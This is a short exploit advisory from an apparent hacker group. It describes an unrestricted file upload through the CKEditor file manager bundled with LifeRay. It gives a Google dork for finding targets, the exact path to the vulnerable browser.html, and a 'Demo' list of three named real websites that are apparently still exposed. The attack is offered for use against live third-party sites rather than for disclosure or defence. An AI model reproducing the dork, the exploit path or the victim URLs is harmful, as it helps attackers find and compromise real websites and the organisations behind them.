[+] Title: LifeRay File Upload (CKEditor Vulnerable)
[+] Date: 2020-04-20
[+] Author: h4shur
[+] team : Persian Security Group
[+] Vendor Homepage: www.liferay.com
[+] Software Link: www.liferay.com
[+] Tested on: Windows 10 & Google Chrome
[+] Version : All Versions
[+] Category : Web Application Bugs
[+] Vulnerable File: /browser.html
[+} Dork : inurl:/ckeditor/editor/filemanager/
### POC:
[+] Exploit : site.com/html/js/editor/ckeditor/editor/filemanager/browser/liferay/browser.html
### Note:
* If you are careful, in the exploit that friends find, it is in the folder (FCKeditor) and the exploit that I found is in the folder (CKeditor).
This exploit has been tested in all versions of LifeRay and the file can be uploaded in all tested sites.
* Exploits found by friends (note the folder "FCKeditor"):
/html/js/editor/fckeditor/editor/filemanager/browser/liferay/browser.html
* Newly discovered exploits (see folder "CKeditor"):
/html/js/editor/ckeditor/editor/filemanager/browser/liferay/browser.html
* LifeRay allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. Uploaded files represent a significant risk to applications.
### Demo:
[+] http://assol-express.vetrf.ru/html/js/editor/ckeditor/editor/filemanager/browser/liferay/browser.html
[+] https://vyvchay.com/html/js/editor/ckeditor/editor/filemanager/browser/liferay/browser.html
[+] https://www.primar.org/html/js/editor/ckeditor/editor/filemanager/browser/liferay/browser.html
### Special Thanks:
* Po0ri4 & b4ckdo0r
### Contact Me :
* Telegram : @h4shur
* Email : h4shursec@gmail.com
* Instagram : @netedit0r
* twitter : @h4shur